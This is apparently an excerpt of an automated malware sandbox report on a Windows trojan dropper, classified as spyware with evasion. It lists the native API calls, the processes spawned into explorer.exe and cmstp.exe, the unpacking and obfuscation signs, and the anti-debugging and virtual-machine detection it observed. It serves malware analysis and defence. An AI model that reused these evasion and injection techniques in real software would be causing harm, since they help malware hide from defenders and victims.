Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B36E30 3_2_00B36E30
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BDD616 3_2_00BDD616
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE1FF1 3_2_00BE1FF1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BEDFCE 3_2_00BEDFCE
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: String function: 00401980 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: String function: 00B1B150 appears 72 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E833 NtAllocateVirtualMemory, 3_2_0041E833
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E653 NtCreateFile, 3_2_0041E653
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E703 NtReadFile, 3_2_0041E703
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041E783 NtClose, 3_2_0041E783
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B598F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00B598F0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00B59860
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59840 NtDelayExecution,LdrInitializeThunk, 3_2_00B59840
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B599A0 NtCreateSection,LdrInitializeThunk, 3_2_00B599A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00B59910
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A20 NtResumeThread,LdrInitializeThunk, 3_2_00B59A20
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00B59A00
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A50 NtCreateFile,LdrInitializeThunk, 3_2_00B59A50
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B595D0 NtClose,LdrInitializeThunk, 3_2_00B595D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59540 NtReadFile,LdrInitializeThunk, 3_2_00B59540
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B596E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00B596E0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00B59660
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B597A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00B597A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00B59780
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00B59FE0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00B59710
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B598A0 NtWriteVirtualMemory, 3_2_00B598A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59820 NtEnumerateKey, 3_2_00B59820
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5B040 NtSuspendThread, 3_2_00B5B040
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B599D0 NtCreateProcessEx, 3_2_00B599D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59950 NtQueueApcThread, 3_2_00B59950
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A80 NtOpenDirectoryObject, 3_2_00B59A80
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59A10 NtQuerySection, 3_2_00B59A10
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5A3B0 NtGetContextThread, 3_2_00B5A3B0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59B00 NtSetValueKey, 3_2_00B59B00
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B595F0 NtQueryInformationFile, 3_2_00B595F0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5AD30 NtSetContextThread, 3_2_00B5AD30
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59520 NtWaitForSingleObject, 3_2_00B59520
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59560 NtWriteFile, 3_2_00B59560
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B596D0 NtCreateKey, 3_2_00B596D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59610 NtEnumerateValueKey, 3_2_00B59610
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59670 NtQueryInformationProcess, 3_2_00B59670
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59650 NtQueryValueKey, 3_2_00B59650
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59730 NtQueryVirtualMemory, 3_2_00B59730
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5A710 NtOpenProcessToken, 3_2_00B5A710
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59770 NtSetInformationFile, 3_2_00B59770
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B5A770 NtOpenThread, 3_2_00B5A770
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B59760 NtOpenProcess, 3_2_00B59760
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\mcwfy.exe C5E0F86A68DCBD03B9A506768F86C385C360D3CF67B9CC0B5760F7B3F1D91F48
Source: u8QPnVhq0N.exe ReversingLabs: Detection: 46%
Source: u8QPnVhq0N.exe Virustotal: Detection: 48%
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File read: C:\Users\user\Desktop\u8QPnVhq0N.exe Jump to behavior
Source: u8QPnVhq0N.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\u8QPnVhq0N.exe C:\Users\user\Desktop\u8QPnVhq0N.exe
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe Jump to behavior
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File created: C:\Users\user\AppData\Local\Temp\nsl6A3D.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/5@12/10
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: u8QPnVhq0N.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Unpacked PE file: 3.2.mcwfy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00410A64 push ecx; ret 1_2_00410A77
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040A846 push cs; retf 3_2_0040A847
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00411320 push ds; retf 3_2_00411322
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040DC2C pushfd ; iretd 3_2_0040DC3A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040B4FA push ecx; ret 3_2_0040B501
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0040AD0D push 255F11F9h; retf 3_2_0040AD18
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_0041B674 pushad ; retf 3_2_0041B678
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00401E20 push eax; ret 3_2_00401E22
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B6D0D1 push ecx; ret 3_2_00B6D0E4
Drops PE files
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe File created: C:\Users\user\AppData\Local\Temp\mcwfy.exe Jump to dropped file
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 1008 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe TID: 3608 Thread sleep time: -50000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B46A60 rdtscp 3_2_00B46A60
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 880 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 876 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe API coverage: 8.4 %
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_020607DA GetSystemInfo, 1_2_020607DA
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8
Source: C:\Users\user\Desktop\u8QPnVhq0N.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.533383702.000000000ED9C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWAz
Source: explorer.exe, 00000004.00000002.569424230.0000000004437000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.559686788.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.536187696.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533502137.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581354235.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553825215.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.563071453.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
Source: explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_00401754
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0040B06F GetProcessHeap, 1_2_0040B06F
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B46A60 rdtscp 3_2_00B46A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0206005F mov eax, dword ptr fs:[00000030h] 1_2_0206005F
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_02060109 mov eax, dword ptr fs:[00000030h] 1_2_02060109
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0206013E mov eax, dword ptr fs:[00000030h] 1_2_0206013E
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 1_2_0206017B mov eax, dword ptr fs:[00000030h] 1_2_0206017B
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00B4F0BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00B4F0BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4F0BF mov eax, dword ptr fs:[00000030h] 3_2_00B4F0BF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h] 3_2_00B420A0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B590AF mov eax, dword ptr fs:[00000030h] 3_2_00B590AF
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B19080 mov eax, dword ptr fs:[00000030h] 3_2_00B19080
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B93884 mov eax, dword ptr fs:[00000030h] 3_2_00B93884
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B93884 mov eax, dword ptr fs:[00000030h] 3_2_00B93884
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h] 3_2_00B140E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h] 3_2_00B140E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h] 3_2_00B140E1
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00B3B8E4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00B3B8E4
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B158EC mov eax, dword ptr fs:[00000030h] 3_2_00B158EC
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BAB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00BAB8D0
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B3A830 mov eax, dword ptr fs:[00000030h] 3_2_00B3A830
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B2B02A mov eax, dword ptr fs:[00000030h] 3_2_00B2B02A
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B4002D mov eax, dword ptr fs:[00000030h] 3_2_00B4002D
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE4015 mov eax, dword ptr fs:[00000030h] 3_2_00BE4015
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00BE4015 mov eax, dword ptr fs:[00000030h] 3_2_00BE4015
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h] 3_2_00B97016
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h] 3_2_00B97016
Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe Code function: 3_2_00B97016 mov eax, dword ptr fs:[00000030h] 3_2_00B97016
